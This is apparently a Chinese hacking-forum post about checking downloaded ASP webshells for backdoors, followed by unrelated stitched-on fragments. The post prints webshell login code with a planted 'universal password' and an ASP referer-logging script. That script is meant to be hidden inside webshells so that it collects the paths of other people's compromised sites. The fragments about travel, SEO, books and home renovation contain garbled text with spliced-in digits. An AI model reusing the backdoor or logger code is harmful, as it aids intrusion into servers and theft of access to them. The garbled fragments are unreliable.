我等小菜自己写不来asp马,只能用大虾写的,但网上流传的都不知道是几手的了 难免有些居心不良的人会在里面加后门。 好不容易拿到个shell又被别人偷走了怎么甘心啊! 所以在下完asp木马后要先检查有没后门, 通常加了后门的为了隐秘性,都会加密!所以首先我们要先解密 asp木马解密工具 解密后先检查有无万能密码,也就是说就算你改了木马的密码,他也能用这个密码来登录 正常的: EnD fUNCtION IF SEssIoN("web2a2dmin")<>UsERpaSs thEn IF requeSt.FoRM("pass")<>"" TheN iF REquesT.foRM("pass")=uSERPASS Then SEsSIoN("web2a2dmin")=uSERPAss rESPOnsE.rEdirEct Url ELse rrs"对不起,密码验证失败!" 加有万能密码的: EnD fUNCtION IF SEssIoN("web2a2dmin")<>UsERpaSs thEn IF requeSt.FoRM("pass")<>"" TheN iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then SEsSIoN("web2a2dmin")=uSERPAss rESPOnsE.rEdirEct Url ELse rrs"对不起,密码验证失败!" 1111111就是传说中的万能密码了。 找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了! 下面来找马大多数都喜欢用框架挂马: 找到后删了,到此asp后门就算剔除了! 下面教大家后门的原理: 这是一段收信的asp代码将其保存为1.asp <%url=Request.ServerVariables("HTTP_Referer") set fs=server.CreateObject("Scripting.FileSystemObject") set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True) file.writeline url file.close set file=nothing set fs=nothing %> 代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址 简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里 上传到空间比如 http://127.0.0.1/1.asp 然后里用 插到asp木马中 那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了
培养孩子的世界观最好的就是带孩子多去旅行体验外面的世界。研究表明对带孩子旅行对能在增强孩子的记忆力和学习能力,那么带孩子出去旅行究竟还有那些好处呢,下面友谊长存小编就来和大家说一说。 带孩子旅行的好...
整站优化有多少个词? 什么是整站优化2113? 整站优化主要是指对5261网站的整体架构举行调整,4102使网站内容更契合网民的查1653找习气,获取更多的接见流量,前进查找引擎的信托度以及网站的知名...
这是在豆瓣看到一个作者推荐的网站,关于中国哲学类书籍的网络网站 对于大学生选修哲学类应该很有辅助,书读百遍其义自现 福利虽好,可不要贪杯,偶然调剂,看下正能量也是不错的 下面是这个网站的先容,功...
南北是什么意思(你知道东西南北的来历吗?) 你知道东西南北的来历吗?看了完不得不佩服古人的智慧 东西南北,是最基本的地理方位。那么,你知道东西南北的来历吗?人们是如何确定哪里是东方,哪里是西方,以...
如何查看微信聊天记录iphone的微信可以查到聊天记录吗?在《线性代数》书里 ,行列式和引流矩阵一直如影随形,并且2个的确看起来很类似,因此也常常有些人搞混二者 。引流矩阵:有勾特火尽管这一时期很看长...
▲多乐士焕新服务为抗疫家庭免费打造童话般的家。 原本斑驳的旧墙被翻新成了淡粉色,还画上小山图案。 最近,家住润南花园陈先生家的4个小朋友遇到了件开心事:他们的房间...